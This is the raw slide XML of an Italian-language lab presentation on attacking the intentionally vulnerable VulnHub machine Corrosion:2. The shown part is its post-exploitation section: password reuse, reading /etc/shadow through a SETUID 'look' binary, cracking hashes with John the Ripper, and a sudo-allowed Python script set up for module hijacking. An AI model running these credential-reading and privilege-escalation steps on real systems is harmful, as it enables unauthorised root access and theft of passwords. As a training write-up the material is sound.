          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege</a:t>
            </a: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Escalation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Mantaining</a:t>
            </a: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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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124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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099651" y="1514983"/>
            <a:ext cx="9673389" cy="3795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Tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, eseguiamo una shell di comando del sistema</a:t>
            </a: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Dopodiché tentiamo l’accesso agli utenti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jaye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>randy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, sfruttando la stessa password che ci ha permesso di accedere come l’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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L’autentificazione ha successo con l’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jaye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, in questo modo possiamo ispezionare la sua directory, avendo ottenuto i suoi permessi</a:t>
            </a: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8D666BC-D1FB-B4AF-A27D-340092F12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30" y="4314613"/>
            <a:ext cx="3028035" cy="1855893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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9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F6821D44-4C0B-8248-CF8B-4CB60F273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72387"/>
            <a:ext cx="4485640" cy="2331712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C6CB5AF-A944-3AAC-0B26-16441BEAFCF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5201920" y="5242559"/>
            <a:ext cx="7344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938125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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113198" y="1785917"/>
            <a:ext cx="9673389" cy="3795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Delle directory presenti in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jaye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, l’unica che presenta dati al proprio interno è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a: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Notiamo che il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>look </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>è un eseguibile, avente il SETUID attivo. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5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23F0ADD0-C7C4-79DD-F753-55F0AA894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06" y="3743851"/>
            <a:ext cx="6220693" cy="1381318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1806654888"/>
      </p:ext>
    </p:extLst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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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L’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>look </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in Unix/Linux e un comando di ricerca che consente di trovare le corrispondenze esatte delle parole all’interno di un file o di un elenco di file. E possibile specificare le seguenti opzioni:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-b: indica la corrispondenza solo all’inizio di una parola.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-d: indica la corrispondenza solo all’interno di parole separate da spazi o caratteri non alfabetici.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-f: indica la corrispondenza esatta di tutto il campo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: specifica il carattere da utilizzare come separatore di campo invece dello spazio predefinito</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: e la stringa da cercare. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>file ...: specifica il file o l’elenco di file in cui cercare. </a:t>
            </a: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  <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT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571702"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Eseguiamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>look ’’ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>per cercare corrispondenze esatte di una stringa vuota all’interno del file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shadow</a:t>
            </a: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Il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>contiene le informazioni relative agli account degli utenti e alle loro password crittografate nel sistema Unix/Linux. Queste password sono generalmente crittografate utilizzando algoritmi hash come MD5, SHA-256 o altri. Inoltre, accedere o manipolare il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>richiede privilegi di amministratore (root) e, poiché il proprietario di look è proprio root, e poiché ha il SETUID acceso, tale requisito è soddisfatto.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" i="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buClr>
                <a:schemeClr val="bg1"/>
              </a:buClr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0">
              <a:latin typeface="+mn-lt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D8D5383-E70C-A185-14A7-4636ED80B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8" y="4887497"/>
            <a:ext cx="11259544" cy="781784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3130748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0EE75295-E87F-A6A6-9CA2-B8840EA7121F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2685977" y="4517813"/>
            <a:ext cx="6326380" cy="1578187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="4472C4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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="325204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Strumenti</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" cap="all" spc="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utilizzati</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" cap="all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+mj-cs"/>
            </a:endParaRP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979B1A2-164D-B8EA-C1CB-0CA455AF57AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179174" y="1310945"/>
            <a:ext cx="9658159" cy="4143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+mn-lt"/>
              </a:rPr>
              <a:t>La macchina da analizzare è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Corrosion:2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, una macchina vulnerabile by design, scaricata dal sito di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vulnhub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>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  <a:latin typeface="+mn-lt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+mn-lt"/>
              </a:rPr>
              <a:t>È stato utilizzato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>  per configurare il laboratorio virtuale. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>L’architettura di rete prevede una macchina attaccante e la macchina target connesse sulla stessa rete virtuale con NAT.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/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+mn-lt"/>
              </a:rPr>
              <a:t>Macchina «attaccante» con sistema operativo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/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  <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Macchina «target»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bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt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chemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>L’indirizzo IP della macchina target non è noto a priori poiché viene assegnato in modo automatico dal DHCP.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Immagine 3" descr="Immagine che contiene schermata, testo, Carattere, logo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCAD9214-DB9A-170A-C1DC-21DFF8FEC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87" y="4722417"/>
            <a:ext cx="56197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16807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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Salviamo l’output nei file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hashrandy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hashroot</a:t>
            </a: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Tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>John The Ripper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, tentiamo di effettuare il cracking delle password</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr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D16AF61-931D-27AA-414E-85A46069C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26" y="2301507"/>
            <a:ext cx="8822748" cy="2055640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37C39DD-80B5-FF23-8475-3C88C80C2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26" y="4530150"/>
            <a:ext cx="8822748" cy="2083149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384767799"/>
      </p:ext>
    </p:extLst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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Effettuiamo l’accesso come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>randy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a: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Eseguendo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sudo --list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, vengono elencati i comandi consentiti (e vietati) per l’utente che li invoca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sull’host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> corrente </a:t>
            </a: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L’ultima riga specifica che l’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>randy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>può eseguire con privilegi di root il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>«/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/bin/python3.8 /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>randy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/randombase64.py»</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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D63948D-C057-78B3-24DF-24AF03AF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229234"/>
            <a:ext cx="10668000" cy="1847850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3165752950"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow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post exploitation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Privilege escalation</a:t>
            </a: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C6FC0B6-921E-8C09-B9F2-49BDFC053EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194478" y="1453163"/>
            <a:ext cx="9673389" cy="507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Il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>randombase64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> non ha i permessi di scrittura abilitati</a:t>
            </a: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Sfruttiamo il modulo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> che il file importa per poter eseguire una shell di root</a:t>
            </a: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Cerchiamo dapprima il file tramite il comando </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> / -name base64.py 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
